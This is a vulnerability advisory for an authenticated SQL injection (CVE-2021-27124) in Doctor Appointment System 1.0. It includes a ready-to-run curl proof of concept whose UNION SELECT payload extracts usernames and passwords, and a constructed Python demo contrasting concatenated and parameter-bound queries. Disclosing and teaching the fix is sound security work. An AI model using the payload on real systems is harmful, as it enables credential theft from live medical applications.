# CVE-2021-27124 Doctor Appointment System 1.0 SQL Injection Vulnerability

# Exploit Title: Doctor Appointment System 1.0 - Authenticated SQL Injection
# Date: 2021-02-09
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Software Link: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Version: V1.0


Vulnerable File:
----------------
http://host/patient/search_result.php

Vulnerable Issue:
-----------------
The `expertise` POST parameter has no input validation.

POC:
----
1] Log in as a normal patient user.
2] Insert the cookie obtained after a successful login into the command below:

curl -i -s -o tmp -k -X $'POST' \
    -H $'Host: 192.168.1.12' \
    -H $'Content-Type: application/x-www-form-urlencoded' \
    -H $'Content-Length: 288' \
    -H $'Connection: close' \
    -H $'Cookie: PHPSESSID=b85jccq5ns65d75g69j2uj37hf' \
    -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=b85jccq5ns65d75g69j2uj37hf' \
    --data-binary $'expertise=Bone\'+union+select+concat(\'Username-\',username),2,3,(select+(%40a)+from+(select(%40a%3a%3d0x00),(select+(%40a)+from+(information_schema.schemata)where+(%40a)in+(%40a%3a%3dconcat(%40a,schema_name,\'
\'))))a),concat(\'Password\',\'-\',password),6,7,8,9,10,11,12+from+users%23&submit=' \
    $'http://host/patient/search_result.php'

3] Check the tmp file for sensitive information from the database.
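Added example, not code from the advisory or from Doctor Appointment System: a constructed SQLite stand-in for the doctor search that shows the two query-building patterns behind this bug class, the string-concatenated form that a payload like the one above exploits and the parameter-bound form that removes it. The table and column names and the payload are assumptions shaped after the advisory.

```python
import sqlite3

# Constructed stand-in for the doctor search behind search_result.php: an
# in-memory SQLite database with a doctors table (searched by expertise) and a
# users table (what the advisory's payload extracts). Not the project's schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE doctors (id INTEGER, name TEXT, expertise TEXT);
        INSERT INTO doctors VALUES (1, 'Dr. Abel', 'Bone'), (2, 'Dr. Baker', 'Heart');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hash1'), (2, 'patient', 'hash2');
    """)
    return db

def search_unsafe(db, expertise):
    # Vulnerable pattern: the POST value is spliced into the SQL text, so a
    # closing quote followed by UNION SELECT appends attacker-chosen columns
    # (three here, matching the original SELECT, just as the advisory's payload
    # matches its target query's twelve).
    sql = f"SELECT id, name, expertise FROM doctors WHERE expertise = '{expertise}'"
    return db.execute(sql).fetchall()

def search_safe(db, expertise):
    # Hardened pattern: the value is bound as a parameter and is never parsed
    # as SQL, whatever quotes or keywords it contains.
    sql = "SELECT id, name, expertise FROM doctors WHERE expertise = ?"
    return db.execute(sql, (expertise,)).fetchall()

# Constructed payload with the same shape as the advisory's (quote break,
# UNION SELECT, trailing comment); SQLite comments use -- where MySQL uses #.
PAYLOAD = "Bone' UNION SELECT id, username, password FROM users -- "

def demo():
    """Return (rows leaked by the unsafe query, rows from the safe query)."""
    db = make_db()
    return search_unsafe(db, PAYLOAD), search_safe(db, PAYLOAD)

if __name__ == "__main__":
    leaked, hardened = demo()
    print("unsafe:", leaked)      # the matching doctor row plus every users row
    print("safe:  ", hardened)    # [] : no doctor has that literal expertise
```

The same parameter binding is available in PHP through PDO or mysqli prepared statements, which is the fix a maintainer would apply to search_result.php.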